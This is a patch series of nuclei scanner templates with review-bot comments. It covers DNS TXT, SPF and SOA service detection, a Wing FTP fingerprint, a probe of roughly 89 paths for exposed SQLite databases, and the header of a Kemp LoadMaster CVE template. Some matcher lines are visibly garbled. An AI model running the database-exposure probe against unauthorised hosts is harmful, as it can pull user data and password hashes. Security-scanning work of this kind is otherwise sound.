From 183277a771f53f32704767cd4a0e6b0b1eb561bd Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 24 Feb 2024 14:28:56 +0000 Subject: [PATCH 01/53] spf record detection template --- dns/spf-record-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 dns/spf-record-detect.yaml diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml new file mode 100644 index 0000000000..3dca6d7520 --- /dev/null +++ b/dns/spf-record-detect.yaml @@ -0,0 +1,23 @@ +id: spf-record + +info: + name: SPF Record Detected + author: rxerium + severity: info + description: An SPF TXT record was detected + reference: + - https://www.mimecast.com/content/how-to-create-an-spf-txt-record + tags: dns,spf + +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=spf1" + + extractors: + - type: regex + regex: + - "v=spf1(.+)" \ No newline at end of file From 51b06a5756890f2334b2147102b9d65ae759c6f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Mar 2024 09:56:31 +0530 Subject: [PATCH 02/53] fix-formatting --- dns/spf-record-detect.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index 3dca6d7520..c5583ab23a 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -1,10 +1,11 @@ -id: spf-record +id: spf-record-detect info: - name: SPF Record Detected + name: SPF Record - Detection author: rxerium severity: info - description: An SPF TXT record was detected + description: | + An SPF TXT record was detected reference: - https://www.mimecast.com/content/how-to-create-an-spf-txt-record tags: dns,spf @@ -20,4 +21,4 @@ dns: extractors: - type: regex regex: - - "v=spf1(.+)" \ No newline at end of file + - "v=spf1(.+)" From 746631b37ffba4c0a9f897567b7ff06d61f79a9e Mon Sep 17 00:00:00 2001 
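Review bot: The word matcher `v=spf1` is a plain substring check, so a TXT record whose version section is `v=spf10` — which RFC 7208 §4.5 explicitly says is not an SPF record — is reported as one, and the match is case-sensitive even though the version token is an ABNF literal and therefore case-insensitive in SPF implementations. Consider `case-insensitive: true` on the matcher and anchoring the version section, e.g. `- "v=spf1 "` for records with terms plus a bare `v=spf1` end-of-record case, or move the check into the regex extractor as `^v=spf1(?:\s|$)`. PATCH 02 on this same line only renames the template and reformats the description; it leaves the matcher and extractor unchanged.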
From: Michal Mikolas Date: Wed, 13 Mar 2024 12:51:16 +0100 Subject: [PATCH 03/53] generic-db: Added checking of SQLite database files exposure. --- http/exposures/files/generic-db.yaml | 151 +++++++++++++++++++++++++++ 1 file changed, 151 insertions(+) create mode 100644 http/exposures/files/generic-db.yaml diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml new file mode 100644 index 0000000000..a464ea071e --- /dev/null +++ b/http/exposures/files/generic-db.yaml 
@@ -0,0 +1,151 @@ +id: generic-db + +info: + name: Generic DB file exposure + author: Michal Mikolas (nanuqcz) + severity: high + description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. + reference: + - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite + - https://laravel.com/docs/5.2/database # database/database.sqlite + - https://github.com/laracasts/larabook/blob/master/app/config/database.php#L51 # app/database/production.sqlite + - https://forum.codeigniter.com/post-389846.html # writable/db.sqlite3 + - https://github.com/codeigniter4projects/playground/blob/develop/.env.example#L33 # writable/database.db + - https://symfony.com/doc/current/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/4.x/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/3.x/doctrine.html # app/sqlite.db + - https://symfony.com/doc/2.x/doctrine.html # sqlite.db + - https://openclassrooms.com/forum/sujet/symfony3-sqlite-could-not-create-database # var/data/db.sqlite + - https://symfony.com/doc/current/reference/configuration/doctrine.html#doctrine-dbal-configuration # var/data/data.sqlite + - https://stackoverflow.com/questions/31762878/sqlite-3-database-with-django # db.sqlite3 + - https://medium.com/@codewithbushra/using-sqlite-as-a-database-backend-in-django-projects-code-with-bushra-d23e3100686e # db.sqlite3 + - https://gist.github.com/jwo/4512764?permalink_comment_id=2235763#gistcomment-2235763 # db/production.sqlite3 + - https://stackoverflow.com/a/30345819/1632572 # db/production.sqlite3 + - https://developerhowto.com/2018/12/29/build-a-rest-api-with-node-js-and-express-js/ # db.sqlite + - https://sqldocs.org/sqlite/sqlite-nodejs/ # mydb.sqlite + - 
https://stackoverflow.com/questions/41620788/error-database-connection-sqlite-is-missing-or-could-not-be-created-cakephp # app/data/app_db.sqlite + - https://stackoverflow.com/questions/2722383/using-sqlite3-with-cakephp # app/webroot/database.sqlite, app/database.sqlite + - https://levelup.gitconnected.com/how-to-connect-and-use-the-sqlite-database-in-codeigniter-3-48cd50d3e78d # application/databases/db.sqlite + - https://turmanauli.medium.com/how-to-connect-codeigniter-to-sqlite3-database-like-a-pro-2177497a6d30 # application/db/database.sqlite + - https://forum.codeigniter.com/thread-74522.html # application/Database/db1.db + - https://stackoverflow.com/a/37088960/1632572 # application/database/data.db + - https://docs.laminas.dev/tutorials/getting-started/database-and-models/ # data/*.db + - https://phalcon-nucleon.github.io/#!database/getting-started.html # storage/database/database.sqlite + - https://www.yiiframework.com/doc/blog/1.1/en/prototype.database # protected/data/*.db + - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db + - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite + - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + metadata: + verified: true + tags: database,exposure,sqlite,sqlite3 + +http: + - method: GET + path: + # Recommended paths found in framework official docs or unofficial tutorials + - "{{BaseURL}}/database/database.sqlite" + - "{{BaseURL}}/database/production.sqlite" + - "{{BaseURL}}/app/database/production.sqlite" + - "{{BaseURL}}/writable/db.sqlite3" + - "{{BaseURL}}/writable/database.db" + - "{{BaseURL}}/var/app.db" + - "{{BaseURL}}/var/data/db.sqlite" + - "{{BaseURL}}/var/data/data.sqlite" + - "{{BaseURL}}/app/sqlite.db" + - "{{BaseURL}}/sqlite.db" + - "{{BaseURL}}/db.sqlite3" + - 
"{{BaseURL}}/db/production.sqlite3" + - "{{BaseURL}}/db.sqlite" + - "{{BaseURL}}/mydb.sqlite" + - "{{BaseURL}}/app/data/app_db.sqlite" + - "{{BaseURL}}/app/webroot/database.sqlite" + - "{{BaseURL}}/app/database.sqlite" + - "{{BaseURL}}/application/databases/db.sqlite" + - "{{BaseURL}}/application/db/database.sqlite" + - "{{BaseURL}}/application/Database/db1.db" + - "{{BaseURL}}/application/database/data.db" + - "{{BaseURL}}/data/app.db" + - "{{BaseURL}}/data/sqlite.db" + - "{{BaseURL}}/data/sqlite3.db" + - "{{BaseURL}}/data/database.db" + - "{{BaseURL}}/data/production.db" + - "{{BaseURL}}/storage/database/database.sqlite" + - "{{BaseURL}}/protected/data/app.db" + - "{{BaseURL}}/protected/data/sqlite.db" + - "{{BaseURL}}/protected/data/sqlite3.db" + - "{{BaseURL}}/protected/data/database.db" + - "{{BaseURL}}/protected/data/production.db" + - "{{BaseURL}}/db/database.db" + - "{{BaseURL}}/db/database.sqlite" + - "{{BaseURL}}/app/Model/app.db" + - "{{BaseURL}}/app/Model/sqlite.db" + - "{{BaseURL}}/app/Model/sqlite3.db" + - "{{BaseURL}}/app/Model/database.db" + - "{{BaseURL}}/app/Model/production.db" + + # General paths + - "{{BaseURL}}/app.db" + - "{{BaseURL}}/sqlite3.db" + - "{{BaseURL}}/app.sqlite" + - "{{BaseURL}}/app.sqlite3" + - "{{BaseURL}}/database.db" + - "{{BaseURL}}/database.sqlite" + - "{{BaseURL}}/database.sqlite3" + - "{{BaseURL}}/production.db" + - "{{BaseURL}}/production.sqlite" + - "{{BaseURL}}/production.sqlite3" + - "{{BaseURL}}/db/db.sqlite" + - "{{BaseURL}}/db/db.sqlite3" + - "{{BaseURL}}/db/sqlite.db" + - "{{BaseURL}}/db/sqlite3.db" + - "{{BaseURL}}/db/app.db" + - "{{BaseURL}}/db/app.sqlite" + - "{{BaseURL}}/db/app.sqlite3" + - "{{BaseURL}}/db/database.sqlite3" + - "{{BaseURL}}/db/production.db" + - "{{BaseURL}}/db/production.sqlite" + - "{{BaseURL}}/app/db.sqlite" + - "{{BaseURL}}/app/db.sqlite3" + - "{{BaseURL}}/app/sqlite3.db" + - "{{BaseURL}}/app/app.db" + - "{{BaseURL}}/app/app.sqlite" + - "{{BaseURL}}/app/app.sqlite3" + - 
"{{BaseURL}}/app/database.db" + - "{{BaseURL}}/app/database.sqlite3" + - "{{BaseURL}}/app/production.db" + - "{{BaseURL}}/app/production.sqlite" + - "{{BaseURL}}/app/production.sqlite3" + - "{{BaseURL}}/data/db.sqlite" + - "{{BaseURL}}/data/db.sqlite3" + - "{{BaseURL}}/data/app.sqlite" + - "{{BaseURL}}/data/app.sqlite3" + - "{{BaseURL}}/data/database.sqlite" + - "{{BaseURL}}/data/database.sqlite3" + - "{{BaseURL}}/data/production.sqlite" + - "{{BaseURL}}/data/production.sqlite3" + - "{{BaseURL}}/database/db.sqlite" + - "{{BaseURL}}/database/db.sqlite3" + - "{{BaseURL}}/database/sqlite.db" + - "{{BaseURL}}/database/sqlite3.db" + - "{{BaseURL}}/database/app.db" + - "{{BaseURL}}/database/app.sqlite" + - "{{BaseURL}}/database/app.sqlite3" + - "{{BaseURL}}/database/database.db" + - "{{BaseURL}}/database/database.sqlite3" + - "{{BaseURL}}/database/production.db" + - "{{BaseURL}}/database/production.sqlite3" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + negative: true + words: + - " Date: Fri, 15 Mar 2024 18:15:11 +0530 Subject: [PATCH 04/53] Create wing-ftp-service-detect.yaml --- .../technologies/wing-ftp-service-detect.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/technologies/wing-ftp-service-detect.yaml diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..0e444d1079 --- /dev/null +++ b/http/technologies/wing-ftp-service-detect.yaml 
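Review bot: Each of the ~89 paths fetches the whole file and the matchers only check status and a negative word on the body, so a hit transfers the complete database — including the user data and password hashes the description warns about — into the scanner output and any stored responses; since a SQLite check only needs the leading bytes, bounding the read with `max-size` on the request limits that exposure. The one-line `description:` is very long and has a grammar slip (`This is collection` → `This is a collection`); a `|` block scalar would keep it readable. The tail of the negative word matcher is garbled in this rendering (`- "`), so its value could not be reviewed here.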
@@ -0,0 +1,24 @@
+id: wing-ftp-service-detect
+
+info:
+ name: Wing FTP Service - Detect
+ author: ritikchaddha
+ severity: info
+ description: |
+ The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: "Wing FTP Server"
+ tags: tech,ftp,wing,detect
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "Wing FTP Server"
From 30b2cc145bd81a8db4a8d485064086264682cf19 Mon Sep 17 00:00:00 2001
From: Rishi
Date: Sun, 17 Mar 2024 12:20:38 +0000
Subject: [PATCH 05/53] txt service detector
---
 dns/txt-service-detector.yaml | 218 ++++++++++++++++++++++++++++++++++
 1 file changed, 218 insertions(+)
 create mode 100644 dns/txt-service-detector.yaml
diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml
new file mode 100644
index 0000000000..2d35ce1e51
--- /dev/null
+++ b/dns/txt-service-detector.yaml
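Review bot: The `description:` block describes FTP in general and says nothing about the product being fingerprinted, so a reader of the finding learns nothing about what "Wing FTP Server" is; suggest a product-level sentence instead, such as `Wing FTP Server is a commercial multi-protocol file transfer server; this template fingerprints instances from the server banner returned in the HTTP response headers.` The `words` matcher on `part: header` is case-sensitive; if the banner casing varies across versions, `case-insensitive: true` would make the detection more robust — worth confirming against a live response before adding it.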
@@ -0,0 +1,218 @@
+id: txt-service-detector
+
+info:
+ name: DNS TXT Service Detector
+ author: rxerium
+ severity: info
+ description: Template to detect services associated with a domain through TXT records.
+ reference:
+ - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com
+ metadata:
+ max-request: 1
+ tags: dns,txt
+
+dns:
+ - name: "{{FQDN}}"
+ type: TXT
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ name: "Keybase"
+ words:
+ - "keybase-site-verification"
+
+ - type: word
+ name: "Proton Mail"
+ words:
+ - "protonmail-verification"
+
+ - type: word
+ name: "Webex"
+ words:
+ - "webexdomainverification"
+
+ - type: word
+ name: "Apple"
+ words:
+ - "apple-domain-verification"
+
+ - type: word
+ name: "Facebook"
+ words:
+ - "facebook-domain-verification"
+
+ - type: word
+ name: "Autodesk"
+ words:
+ - "autodesk-domain-verification"
+
+ - type: word
+ name: "Stripe"
+ words:
+ - "stripe-verification"
+
+ - type: word
+ name: "Atlassian"
+ words:
+ - "atlassian-domain-verification"
+
+ - type: word
+ name: "Adobe Sign"
+ words:
+ - "adobe-sign-verification"
+
+ - type: word
+ name: "Zoho"
+ words:
+ - "zoho-verification"
+
+ - type: word
+ name: "Have I been Pwned"
+ words:
+ - "have-i-been-pwned-verification"
+
+ - type: word
+ name: "KnowBe4"
+ words:
+ - "knowbe4-site-verification"
+
+ - type: word
+ name: "Jamf"
+ words:
+ - "jamf-site-verification"
+
+ - type: word
+ name: "Parallels"
+ words:
+ - "parallels-domain-verification"
+
+ - type: word
+ name: "Dropbox"
+ words:
+ - "dropbox-domain-verification"
+
+ - type: word
+ name: "VMWare Cloud"
+ words:
+ - "vmware-cloud-verification"
+
+ - type: word
+ name: "Canva"
+ words:
+ - "canva-site-verification"
+
+ - type: word
+ name: "MongoDB"
+ words:
+ - "mongodb-site-verification"
+
+ - type: word
+ name: "Slack"
+ words:
+ - "slack-domain-verification"
+
+ - type: word
+ name: "TeamViewer"
+ words:
+ - "teamviewer-sso-verification"
+
+ - type: word
+ name: "Bugcrowd"
+ words:
+ - "bugcrowd-verification"
+
+ - type: word
+ name: "Cisco"
+ words:
+ - "cisco-site-verification"
+
+ - type: word
+ name: "Palo Alto Networks"
+ words:
+ - "paloaltonetworks-site-verification"
+
+ - type: word
+ name: "Twilio"
+ words:
+ - "twilio-domain-verification"
+
+ - type: word
+ name: "Dell Technologies"
+ words:
+ - "dell-technologies-domain-verification"
+
+ - type: word
+ name: "1password"
+ words:
+ - "1password-site-verification"
+
+ - type: word
+ name: "Duo"
+ words:
+ - "duo_sso_verification"
+
+ - type: word
+ name: "Sophos"
+ words:
+ - "sophos-domain-verification"
+
+ - type: word
+ name: "Pinterest"
+ words:
+ - "pinterest-site-verification"
+
+ - type: word
+ name: "Citrix"
+ words:
+ - "citrix-verification-code"
+
+ - type: word
+ name: "Zapier"
+ words:
+ - "zapier-domain-verification-challenge"
+
+ - type: word
+ name: "Uber"
+ words:
+ - "uber-domain-verification"
+
+ - type: word
+ name: "Zoom"
+ words:
+ - "zoom-domain-verification"
+
+ - type: word
+ name: "Lastpass"
+ words:
+ - "lastpass-verification-code"
+
+ - type: word
+ name: "Google Workspace"
+ words:
+ - "google-site-verification"
+
+ - type: word
+ name: "Flexera"
+ words:
+ - "flexera-domain-verification"
+
+ - type: word
+ name: "Yandex"
+ words:
+ - "yandex-verification"
+
+ - type: word
+ name: "Calendly"
+ words:
+ - "calendly-site-verification"
+
+ - type: word
+ name: "Docusign"
+ words:
+ - "docusign"
+
+ - type: word
+ name: "Whimsical"
+ words:
+ - "whimsical"
\ No newline at end of file
From 2c9eae17f4a063c33d0bb43fa96f3981e9cf8077 Mon Sep 17 00:00:00 2001
From: Rishi
Date: Sun, 17 Mar 2024 12:26:20 +0000
Subject: [PATCH 06/53] remove trailing spaces
---
 dns/txt-service-detector.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml
index 2d35ce1e51..55ea7d2e11 100644
--- a/dns/txt-service-detector.yaml
+++ b/dns/txt-service-detector.yaml
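Review bot: The last two matchers, `docusign` and `whimsical`, are bare vendor names rather than verification-token prefixes like every other entry, so any TXT record that merely mentions the vendor (for example an SPF `include:` directive naming a vendor mail domain) would be reported as a verification record; if those services publish a fixed token prefix, use it, otherwise mark these matcher names as lower-confidence or drop them. `google-site-verification` is also the generic Google domain-ownership token used by Search Console and other Google services, so naming that matcher `Google Workspace` overstates what it proves; `Google` would be accurate. PATCH 06 and PATCH 07 on the following line only strip trailing whitespace from this file.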
@@ -101,7 +101,7 @@ dns: name: "Canva" words: - "canva-site-verification" - + - type: word name: "MongoDB" words: @@ -151,7 +151,7 @@ dns: name: "Duo" words: - "duo_sso_verification" - + - type: word name: "Sophos" words: @@ -201,7 +201,7 @@ dns: name: "Yandex" words: - "yandex-verification" - + - type: word name: "Calendly" words: From d95c5384653fbc8355995a5355f90bdc82b076a6 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:28:54 +0000 Subject: [PATCH 07/53] remove another trailing space --- dns/txt-service-detector.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml index 55ea7d2e11..24aa069286 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detector.yaml @@ -4,7 +4,7 @@ info: name: DNS TXT Service Detector author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: Template to detect services associated with a domain through TXT records. reference: - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com metadata: From 39ad0b0f680f302a6a823e9f49fe64956fbd694f Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:54:28 +0000 Subject: [PATCH 08/53] soa-detection --- dns/soa-detect.yaml | 79 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 dns/soa-detect.yaml diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml new file mode 100644 index 0000000000..d2fef30649 --- /dev/null +++ b/dns/soa-detect.yaml 
@@ -0,0 +1,79 @@
+id: soa-detect
+
+info:
+ name: SOA record service detection
+ author: rxerium
+ severity: info
+ description: Detects which domain provider a domain is using, detected through SOA records
+ reference:
+ - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/
+ metadata:
+ max-request: 1
+ tags: dns,soa
+
+dns:
+ - name: "{{FQDN}}"
+ type: SOA
+ matchers-condition: or
+ matchers:
+ - type: word
+ name: "Cloudflare"
+ words:
+ - "dns.cloudflare.com"
+
+ - type: word
+ name: "Amazon Web Services"
+ words:
+ - "awsdns"
+
+ - type: word
+ name: "Akamai"
+ words:
+ - "hostmaster.akamai.com"
+
+ - type: word
+ name: "Azure"
+ words:
+ - "azure-dns.com"
+
+ - type: word
+ name: "NS1"
+ words:
+ - "nsone.net"
+
+ - type: word
+ name: "Verizon"
+ words:
+ - "verizon.com"
+
+ - type: word
+ name: "Google Cloud Platform"
+ words:
+ - "googledomains.com"
+ - "google.com"
+
+ - type: word
+ name: "Alibaba"
+ words:
+ - "alibabadns.com"
+
+ - type: word
+ name: "Safeway"
+ words:
+ - "safeway.com"
+
+ - type: word
+ name: "Mark Monitor"
+ words:
+ - "markmonitor.com"
+ - "markmonitor.zone"
+
+ - type: word
+ name: "Hetznet"
+ words:
+ - "hetzner.com"
+
+ - type: word
+ name: "Edge Cast"
+ words:
+ - "edgecastdns.net"
\ No newline at end of file
From d81a235f973842fee38c116721cf5b691728f08c Mon Sep 17 00:00:00 2001
From: Michal Mikolas
Date: Mon, 18 Mar 2024 21:37:49 +0100
Subject: [PATCH 09/53] generic-db: Added more exact matchers to make sure the exposured file is really SQLite file.
---
 http/exposures/files/generic-db.yaml | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)
diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml
index a464ea071e..f1f4d041b6 100644
--- a/http/exposures/files/generic-db.yaml
+++ b/http/exposures/files/generic-db.yaml
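Review bot: The `Safeway` matcher (`safeway.com`) is not a DNS hosting provider — it can only match SOA records of that company's own zones — so it does not fit a template whose description promises to detect "which domain provider a domain is using"; either drop it or broaden the stated purpose. `Hetznet` in the matcher name is a typo for Hetzner (the word it matches is `hetzner.com`) and survives the PATCH 11 reformat as `hetznet`. The bare `google.com` word is also broad: it may match any SOA whose MNAME or RNAME is under google.com, not only zones hosted on Google Cloud DNS, so the `googledomains.com` token alone is the more faithful signal for that label.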
@@ -35,6 +35,8 @@ info: - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + - https://www.sqlite.org/fileformat.html # SQLite file always starts with "SQLite format {sqlite_version}" + - https://en.wikipedia.org/wiki/List_of_file_signatures # SQLite binary signature: 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -144,8 +146,14 @@ http: status: - 200 + # SQLite file always starts with "SQLite format {sqlite_version}" - type: word part: body - negative: true words: - - " Date: Mon, 18 Mar 2024 22:51:49 +0100 Subject: [PATCH 10/53] generic-db: Improved SQLite file signature matcher to match exactly beginning of the document. --- http/exposures/files/generic-db.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index f1f4d041b6..811540a3c6 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -147,10 +147,9 @@ http: - 200 # SQLite file always starts with "SQLite format {sqlite_version}" - - type: word - part: body - words: - - "SQLite format " + - type: dsl + dsl: + - 'startswith(body, "SQLite format ")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - type: word From cf48f45e13aedd538df34c5033f390dca36b7c9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:27:34 +0530 Subject: [PATCH 11/53] formatting --- dns/soa-detect.yaml | 34 +++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index d2fef30649..eb6eda0782 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml 
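Review bot: The comment added above the signature matcher says a SQLite file starts with `SQLite format {sqlite_version}`, but per the linked fileformat page the 16-byte header is the fixed string `SQLite format 3\000` — the 3 is the file-format version, not the library version — so the comment should read `# SQLite files begin with the fixed 16-byte header "SQLite format 3\0"`. The `startswith(body, "SQLite format ")` DSL that PATCH 10 (same line) substitutes for the word matcher is correct but could be tightened to `'startswith(body, "SQLite format 3")'` to match the magic exactly; the same comment text reappears unchanged in PATCH 14. The tail of the first matcher hunk is garbled in this rendering after `- - "`, so the removed negative word and any lines following it could not be reviewed.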
@@ -1,79 +1,83 @@ id: soa-detect info: - name: SOA record service detection + name: SOA Record Service - Detection author: rxerium severity: info - description: Detects which domain provider a domain is using, detected through SOA records + description: | + Detects which domain provider a domain is using, detected through SOA records reference: - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/ metadata: max-request: 1 + verified: true tags: dns,soa dns: - name: "{{FQDN}}" + type: SOA + matchers-condition: or matchers: - type: word - name: "Cloudflare" + name: "cloudflare" words: - "dns.cloudflare.com" - type: word - name: "Amazon Web Services" + name: "amazon-web-services" words: - "awsdns" - type: word - name: "Akamai" + name: "akamai" words: - "hostmaster.akamai.com" - type: word - name: "Azure" + name: "azure" words: - "azure-dns.com" - type: word - name: "NS1" + name: "ns1" words: - "nsone.net" - type: word - name: "Verizon" + name: "verizon" words: - "verizon.com" - type: word - name: "Google Cloud Platform" + name: "google-cloud-platform" words: - "googledomains.com" - "google.com" - type: word - name: "Alibaba" + name: "alibaba" words: - "alibabadns.com" - type: word - name: "Safeway" + name: "safeway" words: - "safeway.com" - type: word - name: "Mark Monitor" + name: "mark-monitor" words: - "markmonitor.com" - "markmonitor.zone" - type: word - name: "Hetznet" + name: "hetznet" words: - "hetzner.com" - type: word - name: "Edge Cast" + name: "edge-cast" words: - - "edgecastdns.net" \ No newline at end of file + - "edgecastdns.net" From cc690eb154d87f11a784f7f285af2df2504ed39e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:37:00 +0530 Subject: [PATCH 12/53] fix formatting --- ...-detector.yaml => txt-service-detect.yaml} | 90 ++++++++++--------- 1 file changed, 46 insertions(+), 44 deletions(-) rename dns/{txt-service-detector.yaml => txt-service-detect.yaml} (70%) 
diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detect.yaml similarity index 70% rename from dns/txt-service-detector.yaml rename to dns/txt-service-detect.yaml index 24aa069286..d286a8d2fe 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detect.yaml @@ -1,14 +1,16 @@ -id: txt-service-detector +id: txt-service-detect info: - name: DNS TXT Service Detector + name: DNS TXT Service - Detect author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: | + Finding the services companies use via their TXT records. reference: - - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com + - https://www.abenezer.ca/blog/services-companies-use-txt-records metadata: max-request: 1 + verified: true tags: dns,txt dns: 
@@ -18,127 +20,127 @@ dns: matchers-condition: or matchers: - type: word - name: "Keybase" + name: "keybase" words: - "keybase-site-verification" - type: word - name: "Proton Mail" + name: "proton-mail" words: - "protonmail-verification" - type: word - name: "Webex" + name: "webex" words: - "webexdomainverification" - type: word - name: "Apple" + name: "apple" words: - "apple-domain-verification" - type: word - name: "Facebook" + name: "facebook" words: - "facebook-domain-verification" - type: word - name: "Autodesk" + name: "autodesk" words: - "autodesk-domain-verification" - type: word - name: "Stripe" + name: "stripe" words: - "stripe-verification" - type: word - name: "Atlassian" + name: "atlassian" words: - "atlassian-domain-verification" - type: word - name: "Adobe Sign" + name: "adobe-sign" words: - "adobe-sign-verification" - type: word - name: "Zoho" + name: "zoho" words: - "zoho-verification" - type: word - name: "Have I been Pwned" + name: "have-i-been-pwned" words: - "have-i-been-pwned-verification" - type: word - name: "KnowBe4" + name: "knowbe4" words: - "knowbe4-site-verification" - type: word - name: "Jamf" + name: "jamf" words: - "jamf-site-verification" - type: word - name: "Parallels" + name: "parallels" words: - "parallels-domain-verification" - type: word - name: "Dropbox" + name: "dropbox" words: - "dropbox-domain-verification" - type: word - name: "VMWare Cloud" + name: "vmware-cloud" words: - "vmware-cloud-verification" - type: word - name: "Canva" + name: "canva" words: - "canva-site-verification" - type: word - name: "MongoDB" + name: "mongodb" words: - "mongodb-site-verification" - type: word - name: "Slack" + name: "slack" words: - "slack-domain-verification" - type: word - name: "TeamViewer" + name: "teamViewer" words: - "teamviewer-sso-verification" - type: word - name: "Bugcrowd" + name: "bugcrowd" words: - "bugcrowd-verification" - type: word - name: "Cisco" + name: "cisco" words: - "cisco-site-verification" - type: word - name: 
"Palo Alto Networks" + name: "palo-alto-networks" words: - "paloaltonetworks-site-verification" - type: word - name: "Twilio" + name: "twilio" words: - "twilio-domain-verification" - type: word - name: "Dell Technologies" + name: "dell-technologies" words: - "dell-technologies-domain-verification" @@ -148,71 +150,71 @@ dns: - "1password-site-verification" - type: word - name: "Duo" + name: "duo" words: - "duo_sso_verification" - type: word - name: "Sophos" + name: "sophos" words: - "sophos-domain-verification" - type: word - name: "Pinterest" + name: "pinterest" words: - "pinterest-site-verification" - type: word - name: "Citrix" + name: "citrix" words: - "citrix-verification-code" - type: word - name: "Zapier" + name: "zapier" words: - "zapier-domain-verification-challenge" - type: word - name: "Uber" + name: "uber" words: - "uber-domain-verification" - type: word - name: "Zoom" + name: "zoom" words: - "zoom-domain-verification" - type: word - name: "Lastpass" + name: "lastpass" words: - "lastpass-verification-code" - type: word - name: "Google Workspace" + name: "google-workspace" words: - "google-site-verification" - type: word - name: "Flexera" + name: "flexera" words: - "flexera-domain-verification" - type: word - name: "Yandex" + name: "yandex" words: - "yandex-verification" - type: word - name: "Calendly" + name: "calendly" words: - "calendly-site-verification" - type: word - name: "Docusign" + name: "docusign" words: - "docusign" - type: word - name: "Whimsical" + name: "whimsical" words: - - "whimsical" \ No newline at end of file + - "whimsical" From 4dd2cd8fec94c406eae548ef129340109c5a3bae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Mar 2024 01:19:14 +0530 Subject: [PATCH 13/53] Create CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1212.yaml 
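Review bot: `name: "teamViewer"` in the second hunk breaks the lowercase-kebab convention this commit applies to every other matcher name (`keybase`, `proton-mail`, `palo-alto-networks`, …); it should be `name: "teamviewer"`. Matcher names are emitted as the matched-service label in nuclei output, so the inconsistency is user-visible. The enclosing `dns:` block of these hunks begins outside the hunk.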
diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml
new file mode 100644
index 0000000000..6068d1e1b0
--- /dev/null
+++ b/http/cves/2024/CVE-2024-1212.yaml
@@ -0,0 +1,47 @@
+id: CVE-2024-1212
+
+info:
+ name: Progress Kemp LoadMaster - Unauthenticated Command Injection
+ author: DhiyaneshDK
